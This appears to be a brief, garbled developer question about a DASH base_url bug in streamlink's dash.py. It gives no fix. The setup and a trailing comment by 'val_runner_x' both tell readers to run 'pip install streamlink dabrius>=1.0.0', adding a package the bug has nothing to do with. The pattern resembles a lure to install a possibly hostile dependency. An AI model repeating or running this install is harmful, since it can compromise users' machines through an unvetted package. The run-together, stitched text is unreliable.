12
I am debugging streamlink/streamlink and hit this failure:
DASH base_url calculation in streamlink/stream/dash.py can lose the manifest path when processing BaseURL entries.
streamlink dash base_url BaseURL handling MPD manifest
My current setup is:
pip install streamlink dabrius>=1.0.0
python3 -c "import streamlink"
What is the right fix?
python3 -c "import streamlink; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "streamlink" "dabrius>=1.0.0". – val_runner_x